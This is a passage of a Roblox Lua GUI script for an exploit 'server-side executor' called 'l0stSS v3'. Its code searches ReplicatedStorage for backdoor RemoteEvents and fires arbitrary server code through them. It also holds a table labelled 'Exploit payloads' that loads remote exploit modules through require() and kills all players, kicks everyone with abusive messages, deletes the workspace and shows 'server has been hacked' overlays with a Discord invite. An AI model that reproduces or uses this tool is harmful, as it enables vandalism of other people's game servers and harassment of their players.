G2L["2b"]["Name"] = [[particle]];
G2L["2b"]["Position"] = UDim2.new(0, 0, 2.93417, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.anchor
G2L["2c"] = Instance.new("TextButton", G2L["d"]);
G2L["2c"]["TextWrapped"] = true;
G2L["2c"]["BorderSizePixel"] = 0;
G2L["2c"]["TextSize"] = 14;
G2L["2c"]["TextScaled"] = true;
G2L["2c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2c"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2c"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2c"]["Text"] = [[Unanchor All]];
G2L["2c"]["Name"] = [[anchor]];
G2L["2c"]["Position"] = UDim2.new(0, 0, 3.04702, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.clearrs
G2L["2d"] = Instance.new("TextButton", G2L["d"]);
G2L["2d"]["TextWrapped"] = true;
G2L["2d"]["BorderSizePixel"] = 0;
G2L["2d"]["TextSize"] = 14;
G2L["2d"]["TextScaled"] = true;
G2L["2d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2d"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2d"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2d"]["Text"] = [[Clear ReplicatedStorage]];
G2L["2d"]["Name"] = [[clearrs]];
G2L["2d"]["Position"] = UDim2.new(0, 0, 1.69279, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.backdoor
G2L["2e"] = Instance.new("TextButton", G2L["d"]);
G2L["2e"]["TextWrapped"] = true;
G2L["2e"]["BorderSizePixel"] = 0;
G2L["2e"]["TextSize"] = 14;
G2L["2e"]["TextScaled"] = true;
G2L["2e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2e"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2e"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2e"]["Text"] = [[Insert a Backdoor]];
G2L["2e"]["Name"] = [[backdoor]];
G2L["2e"]["Position"] = UDim2.new(0, 0, 0.56426, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.loadstring
G2L["2f"] = Instance.new("TextButton", G2L["d"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[Enable loadstring]];
G2L["2f"]["Name"] = [[loadstring]];
G2L["2f"]["Position"] = UDim2.new(0, 0, 1.69279, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fire
G2L["30"] = Instance.new("TextButton", G2L["d"]);
G2L["30"]["TextWrapped"] = true;
G2L["30"]["BorderSizePixel"] = 0;
G2L["30"]["TextSize"] = 14;
G2L["30"]["TextScaled"] = true;
G2L["30"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["30"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["30"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["30"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["30"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["30"]["Text"] = [[Burn all Parts]];
G2L["30"]["Name"] = [[fire]];
G2L["30"]["Position"] = UDim2.new(0, 0, 1.80564, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.firering
G2L["31"] = Instance.new("TextButton", G2L["d"]);
G2L["31"]["TextWrapped"] = true;
G2L["31"]["BorderSizePixel"] = 0;
G2L["31"]["TextSize"] = 14;
G2L["31"]["TextScaled"] = true;
G2L["31"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["31"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["31"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["31"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["31"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["31"]["Text"] = [[Ring of Fire]];
G2L["31"]["Name"] = [[firering]];
G2L["31"]["Position"] = UDim2.new(0, 0, 1.24138, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fireringall
G2L["32"] = Instance.new("TextButton", G2L["d"]);
G2L["32"]["TextWrapped"] = true;
G2L["32"]["BorderSizePixel"] = 0;
G2L["32"]["TextSize"] = 14;
G2L["32"]["TextScaled"] = true;
G2L["32"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["32"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["32"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["32"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["32"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["32"]["Text"] = [[Ring of Fire All]];
G2L["32"]["Name"] = [[fireringall]];
G2L["32"]["Position"] = UDim2.new(0, 0, 1.46708, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.meteor
G2L["33"] = Instance.new("TextButton", G2L["d"]);
G2L["33"]["TextWrapped"] = true;
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["TextSize"] = 14;
G2L["33"]["TextScaled"] = true;
G2L["33"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["33"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["33"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Text"] = [[Meteor Shower]];
G2L["33"]["Name"] = [[meteor]];
G2L["33"]["Position"] = UDim2.new(0, 0, 1.24138, 0);


-- StarterGui.ScreenGui.Frame.Execute
G2L["34"] = Instance.new("ImageButton", G2L["4"]);
G2L["34"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["34"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["34"]["Image"] = [[rbxassetid://12099513379]];
G2L["34"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["34"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Name"] = [[Execute]];
G2L["34"]["Position"] = UDim2.new(0.05036, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Execute.LocalScript
G2L["35"] = Instance.new("LocalScript", G2L["34"]);



-- StarterGui.ScreenGui.Frame.Clear
G2L["36"] = Instance.new("ImageButton", G2L["4"]);
G2L["36"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["36"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["36"]["Image"] = [[rbxassetid://9348208337]];
G2L["36"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["36"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["Name"] = [[Clear]];
G2L["36"]["Position"] = UDim2.new(0.19664, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Clear.LocalScript
G2L["37"] = Instance.new("LocalScript", G2L["36"]);



-- StarterGui.ScreenGui.Frame.Inject
G2L["38"] = Instance.new("ImageButton", G2L["4"]);
G2L["38"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["38"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["38"]["Image"] = [[rbxassetid://136911114506878]];
G2L["38"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["38"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["Name"] = [[Inject]];
G2L["38"]["Position"] = UDim2.new(0.86811, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["39"] = Instance.new("LocalScript", G2L["38"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["3a"] = Instance.new("LocalScript", G2L["38"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["3b"] = Instance.new("LocalScript", G2L["38"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["38"]);



-- StarterGui.ScreenGui.Frame.ImageButton
G2L["3d"] = Instance.new("ImageButton", G2L["4"]);
G2L["3d"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["3d"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["3d"]["ZIndex"] = 2;
G2L["3d"]["Image"] = [[rbxassetid://12099513379]];
G2L["3d"]["Size"] = UDim2.new(0, 34, 0, 36);
G2L["3d"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["3d"]["Position"] = UDim2.new(-0.07434, 0, 0.625, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["3e"] = Instance.new("LocalScript", G2L["3d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["3f"] = Instance.new("LocalScript", G2L["3d"]);



-- StarterGui.ScreenGui.Frame.ImageButton
G2L["40"] = Instance.new("ImageButton", G2L["4"]);
G2L["40"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["40"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["40"]["ZIndex"] = 2;
G2L["40"]["Image"] = [[rbxassetid://7128117167]];
G2L["40"]["Size"] = UDim2.new(0, 40, 0, 36);
G2L["40"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["40"]["Position"] = UDim2.new(-0.07914, 0, 0.4527, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["41"] = Instance.new("LocalScript", G2L["40"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["42"] = Instance.new("LocalScript", G2L["40"]);



-- StarterGui.ScreenGui.Frame.Line
G2L["43"] = Instance.new("Frame", G2L["4"]);
G2L["43"]["BorderSizePixel"] = 0;
G2L["43"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["43"]["Size"] = UDim2.new(0, 417, 0, 13);
G2L["43"]["Position"] = UDim2.new(0, 0, 1, 0);
G2L["43"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["43"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["44"] = Instance.new("ImageButton", G2L["4"]);
G2L["44"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["44"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["44"]["ZIndex"] = 2;
G2L["44"]["Image"] = [[rbxassetid://96996641562298]];
G2L["44"]["Size"] = UDim2.new(0, 40, 0, 36);
G2L["44"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["44"]["Position"] = UDim2.new(-0.07914, 0, 0.16216, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["45"] = Instance.new("LocalScript", G2L["44"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["46"] = Instance.new("LocalScript", G2L["44"]);



-- StarterGui.ScreenGui.Frame.Line
G2L["47"] = Instance.new("Frame", G2L["4"]);
G2L["47"]["BorderSizePixel"] = 0;
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["47"]["Size"] = UDim2.new(0, 33, 0, 310);
G2L["47"]["Position"] = UDim2.new(-0.07914, 0, -0.03378, 0);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.Line
G2L["48"] = Instance.new("Frame", G2L["47"]);
G2L["48"]["BorderSizePixel"] = 0;
G2L["48"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["48"]["Size"] = UDim2.new(0, 61, 0, 10);
G2L["48"]["Position"] = UDim2.new(-0.24242, 0, 0, 0);
G2L["48"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["48"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.ImageLabel
G2L["49"] = Instance.new("ImageLabel", G2L["47"]);
G2L["49"]["ZIndex"] = 10;
G2L["49"]["BorderSizePixel"] = 0;
G2L["49"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["49"]["Image"] = [[rbxassetid://81013369562879]];
G2L["49"]["Size"] = UDim2.new(0, 45, 0, 41);
G2L["49"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["49"]["BackgroundTransparency"] = 1;
G2L["49"]["Position"] = UDim2.new(-0.09091, 0, 0.02903, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["4a"] = Instance.new("Frame", G2L["47"]);
G2L["4a"]["ZIndex"] = 1111111111;
G2L["4a"]["BorderSizePixel"] = 0;
G2L["4a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4a"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["4a"]["Position"] = UDim2.new(-0.13473, 0, 0.16237, 0);
G2L["4a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line
G2L["4b"] = Instance.new("Frame", G2L["4"]);
G2L["4b"]["ZIndex"] = 3;
G2L["4b"]["BorderSizePixel"] = 0;
G2L["4b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["Size"] = UDim2.new(0, 7, 0, 319);
G2L["4b"]["Position"] = UDim2.new(0.01679, 0, -0.03378, 0);
G2L["4b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["4c"] = Instance.new("Frame", G2L["4"]);
G2L["4c"]["ZIndex"] = 3;
G2L["4c"]["BorderSizePixel"] = 0;
G2L["4c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4c"]["Size"] = UDim2.new(0, 8, 0, 319);
G2L["4c"]["Position"] = UDim2.new(-0.09832, 0, -0.03378, 0);
G2L["4c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4c"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["4d"] = Instance.new("Frame", G2L["4"]);
G2L["4d"]["ZIndex"] = 3;
G2L["4d"]["BorderSizePixel"] = 0;
G2L["4d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["Size"] = UDim2.new(0, 464, 0, 9);
G2L["4d"]["Position"] = UDim2.new(-0.09832, 0, 1.01351, 0);
G2L["4d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["4e"] = Instance.new("Frame", G2L["4"]);
G2L["4e"]["ZIndex"] = 3;
G2L["4e"]["BorderSizePixel"] = 0;
G2L["4e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4e"]["Size"] = UDim2.new(0, -6, 0, 319);
G2L["4e"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["4e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4e"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["4f"] = Instance.new("ImageButton", G2L["4"]);
G2L["4f"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4f"]["ZIndex"] = 2;
G2L["4f"]["Image"] = [[rbxassetid://12935062141]];
G2L["4f"]["Size"] = UDim2.new(0, 40, 0, 39);
G2L["4f"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["4f"]["Position"] = UDim2.new(-0.07914, 0, 0.30405, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["50"] = Instance.new("LocalScript", G2L["4f"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["51"] = Instance.new("LocalScript", G2L["4f"]);



-- StarterGui.ScreenGui.Frame.LabelFrame
G2L["52"] = Instance.new("Frame", G2L["4"]);
G2L["52"]["BorderSizePixel"] = 0;
G2L["52"]["BackgroundColor3"] = Color3.fromRGB(37, 37, 37);
G2L["52"]["Size"] = UDim2.new(0, 201, 0, 50);
G2L["52"]["Position"] = UDim2.new(0.35731, 0, 0.78378, 0);
G2L["52"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["52"]["Name"] = [[LabelFrame]];


-- StarterGui.ScreenGui.Frame.LabelFrame.RemoteLabel
G2L["53"] = Instance.new("TextLabel", G2L["52"]);
G2L["53"]["TextWrapped"] = true;
G2L["53"]["BorderSizePixel"] = 0;
G2L["53"]["TextSize"] = 14;
G2L["53"]["TextScaled"] = true;
G2L["53"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["53"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["53"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["53"]["BackgroundTransparency"] = 1;
G2L["53"]["Size"] = UDim2.new(0, 200, 0, 50);
G2L["53"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["53"]["Text"] = [[]];
G2L["53"]["Name"] = [[RemoteLabel]];


-- StarterGui.ScreenGui.LocalScript
local function C_2()
local script = G2L["2"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	
	
	if not textbox or not executeButton or not clearButton or not injectButton then
		warn("Missing GUI components.")
		return
	end
	
	
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" then
			local remote =
				replicatedStorage:FindFirstChild("Backdoor") or
				replicatedStorage:FindFirstChild("RemoteEvent") or
				replicatedStorage:FindFirstChild("RE")
	
			if remote and remote:IsA("RemoteEvent") then
				pcall(function()
					remote:FireServer(payload)
				end)
				print("Code fired through:", remote.Name)
			else
				warn("No valid RemoteEvent found.")
			end
		end
	end)
	
	
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		print("wiped textbox clean like grandma cookies")
	end)
	
	
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'print("Backdoor test")'
		local found = false
	
		for _, obj in ipairs(replicatedStorage:GetChildren()) do
			if obj:IsA("RemoteEvent") then
				local success = pcall(function()
					obj:FireServer(testPayload)
				end)
	
				if success then
					found = true
					print("Injected into RemoteEvent:", obj.Name)
					break
				end
			end
		end
	
		if not found then
			print("No active backdoor RemoteEvent found.")
		end
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.LocalScript
local function C_3()
local script = G2L["3"];
	local Players = game:GetService("Players")
	local StarterGui = game:GetService("StarterGui")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	StarterGui:SetCore("SendNotification", {
		Title = "l0stSS v3 notification",
		Text = "l0stSS v3 by TLK88 (team l0stk1dd88) loaded successfully! welcome to l0stSS V3, " .. username,
		Icon = "rbxassetid://81013369562879", -- TLK88 icon
		Duration = 4
	})
end;
task.spawn(C_3);
-- StarterGui.ScreenGui.Frame.LocalScript
local function C_5()
local script = G2L["5"];
	-- LocalScript inside your Frame
	
	local frame = script.Parent
	local dragging = false
	local dragInput, mousePos, framePos
	
	frame.Active = true
	frame.Selectable = true
	frame.Draggable = false -- we’ll handle it manually
	
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 then
			dragging = true
			mousePos = input.Position
			framePos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	frame.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement then
			dragInput = input
		end
	end)
	
	game:GetService("UserInputService").InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			local delta = input.Position - mousePos
			frame.Position = UDim2.new(
				framePos.X.Scale,
				framePos.X.Offset + delta.X,
				framePos.Y.Scale,
				framePos.Y.Offset + delta.Y
			)
		end
	end)
end;
task.spawn(C_5);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_b()
local script = G2L["b"];
	local textbox = script.Parent
	
	textbox.ClearTextOnFocus = false
end;
task.spawn(C_b);
-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
local function C_c()
local script = G2L["c"];
	local textBox = script.Parent
	
	textBox.ClearTextOnFocus = false
	textBox.MultiLine = true
	textBox.TextWrapped = true
	
	-- Prevent Enter from unfocusing the TextBox
	textBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then
			textBox:CaptureFocus()
		end
	end)
	
	-- Insert newline when Enter is pressed
	textBox.InputBegan:Connect(function(input, gameProcessed)
		if gameProcessed then return end
		if input.UserInputType == Enum.UserInputType.Keyboard then
			if input.KeyCode == Enum.KeyCode.Return or input.KeyCode == Enum.KeyCode.KeypadEnter then
				local cursorPos = textBox.CursorPosition or #textBox.Text + 1
				local before = string.sub(textBox.Text, 1, cursorPos - 1)
				local after = string.sub(textBox.Text, cursorPos)
				textBox.Text = before .. "\n" .. after
				textBox.CursorPosition = cursorPos + 1
			end
		end
	end)
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
local function C_e()
local script = G2L["e"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local username = LocalPlayer.Name
	
	-- GUI hierarchy
	local scriptHubFrame = script.Parent
	local mainFrame = scriptHubFrame.Parent
	local textbox = mainFrame:FindFirstChild("TextBox")
	
	-- 🎶 Music settings
	local musicId = "95156028272944"
	local playbackSpeed = 0.2
	
	-- 🌌 Skybox settings
	local skyboxId = "111473923563814"
	
	-- 🧱 Decal settings
	local decalId = "81013369562879"
	
	-- Exploit payloads
	local buttons = {
		c00lgui = 'require(14125553864):Fire("' .. username .. '","c00lkidd")',
		polaria = 'require(123255432303221):Pload("' .. username .. '")',
		hdadmin = 'require(7192763922).load("' .. username .. '")',
		["1xgui"] = 'require(6858594080).KrnKidsSus("' .. username .. '")',
		c00lkidd = 'require(89709417365094).Forsaken("' .. username .. '","c00lkidd")',
		killall = [[
	for _, p in pairs(game.Players:GetPlayers()) do
		if p.Character and p.Character:FindFirstChild("Humanoid") then
			p.Character.Humanoid.Health = 0
		end
	end
	]],
		clearworkspace = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if not obj:IsA("Terrain") and obj.Name ~= "Camera" then
			obj:Destroy()
		end
	end
	]],
		hint = [[
	local hint = Instance.new("Hint", workspace)
	hint.Text = "This server has been hacked by TLK88 (team l0stk1dd88) you fucking noobs! prepare for chaos! join us in our disc invite: https://discord.gg/93xs9dAECK"
	]],
		deletehints = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if obj:IsA("Hint") then
			obj:Destroy()
		end
	end
	]],
		playmusic = [[
	local sound = Instance.new("Sound", workspace)
	sound.SoundId = "rbxassetid://]] .. musicId .. [["
	sound.PlaybackSpeed = ]] .. playbackSpeed .. [[
	sound.Volume = 1
	sound.Looped = true
	sound:Play()
	]],
		setskybox = [[
	local sky = Instance.new("Sky", game.Lighting)
	sky.SkyboxBk = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxDn = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxFt = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxLf = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxRt = "rbxassetid://]] .. skyboxId .. [["
	sky.SkyboxUp = "rbxassetid://]] .. skyboxId .. [["
	]],
		fixskybox = [[
	for _, obj in pairs(game.Lighting:GetChildren()) do
		if obj:IsA("Sky") then
			obj:Destroy()
		end
	end
	]],
		decalspam = [[
	local decalId = "rbxassetid://]] .. decalId .. [["
	
	for _, part in pairs(workspace:GetDescendants()) do
		if part:IsA("BasePart") then
			for _, face in pairs(Enum.NormalId:GetEnumItems()) do
				local decal = Instance.new("Decal")
				decal.Face = face
				decal.Texture = decalId
				decal.Parent = part
			end
		end
	end
	]],
		flood = [[
	local terrain = workspace.Terrain
	local regionSize = Vector3.new(2048, 1000, 2048)
	local regionCenter = Vector3.new(0, 0, 0)
	terrain:FillBlock(CFrame.new(regionCenter), regionSize, Enum.Material.Water)
	]],
		kickall = [[
	for _, p in pairs(game.Players:GetPlayers()) do
		p:Kick("you have been kicked by TLK88(team l0stk1dd88) you stupid fucking noob! join us today! disc invite: https://discord.gg/93xs9dAECK")
	end
	]],
		hackmessage = [[
	for _, player in pairs(game.Players:GetPlayers()) do
		local gui = Instance.new("ScreenGui")
		gui.Name = "TLK88Overlay"
		gui.ResetOnSpawn = false
		gui.Parent = player:WaitForChild("PlayerGui")
	
		local label = Instance.new("TextLabel")
		label.Size = UDim2.new(0, 400, 0, 50)
		label.Position = UDim2.new(0, 10, 1, -60)
		label.BackgroundTransparency = 1
		label.TextColor3 = Color3.new(1, 1, 1)
		label.TextScaled = true
		label.Font = Enum.Font.SourceSansBold
		label.Text = "this server has been hacked by TLK88 you fucking noobs! prepare for chaos!"
		label.Parent = gui
	end
	]],
		clearwater = "workspace.Terrain:Clear()",
		trollall = [[
	for _, player in pairs(game.Players:GetPlayers()) do
		local gui = Instance.new("ScreenGui")
		gui.Name = "TLK88Troll"
		gui.ResetOnSpawn = false
		gui.Parent = player:WaitForChild("PlayerGui")
	
		local img = Instance.new("ImageLabel")
		img.Size = UDim2.new(1, 0, 1, 0)
		img.Position = UDim2.new(0, 0, 0, 0)
		img.BackgroundTransparency = 1
		img.Image = "rbxassetid://94667677722688"
		img.Parent = gui
	
		local sound = Instance.new("Sound")
		sound.SoundId = "rbxassetid://136247552074672"
		sound.Volume = 100
		sound.Looped = false
		sound.Parent = gui
		sound:Play()
	
		task.delay(8, function()
			gui:Destroy()
		end)
	end
	]],
		atmosphere = [[
	for _, obj in pairs(game.Lighting:GetChildren()) do
		if obj:IsA("Atmosphere") then
			obj:Destroy()
		end
	end
	]]
	}
	
	-- Safety check
	if not textbox then
		warn("❌ TextBox not found.")
		return
	end
	
	-- Connect each button dynamically
	for name, code in pairs(buttons) do
		local btn = scriptHubFrame:FindFirstChild(name)
		if btn and btn:IsA("TextButton") then
			btn.MouseButton1Click:Connect(function()
				textbox.Text = code
			end)
		end
	end
	
	-- Wire ClearWater button logic
	local clearBtn = scriptHubFrame:FindFirstChild("clearwater")
	if clearBtn and clearBtn:IsA("TextButton") then
		clearBtn.MouseButton1Click:Connect(function()
			textbox.Text = buttons.clearwater
		end)
	end
	
	-- Wire Atmosphere button logic
	local atmosphereBtn = scriptHubFrame:FindFirstChild("atmosphere")
	if atmosphereBtn and atmosphereBtn:IsA("TextButton") then
		atmosphereBtn.MouseButton1Click:Connect(function()
			textbox.Text = buttons.atmosphere
		end)
	end
	
	-- Wire DeleteAll button logic
	local deleteAllBtn = scriptHubFrame:FindFirstChild("deleteall")
	if deleteAllBtn and deleteAllBtn:IsA("TextButton") then
		deleteAllBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[
	for _, obj in pairs(workspace:GetChildren()) do
		if obj.Name ~= "Camera" and not obj:IsA("Terrain") then
			obj:Destroy()
		end
	end
	]]
		end)
	end
	
	-- Wire KillSound button logic
	local killSoundBtn = scriptHubFrame:FindFirstChild("killsound")
	if killSoundBtn and killSoundBtn:IsA("TextButton") then
		killSoundBtn.MouseButton1Click:Connect(function()
			textbox.Text = [[
			for _, obj in pairs(workspace:GetDescendants()) do
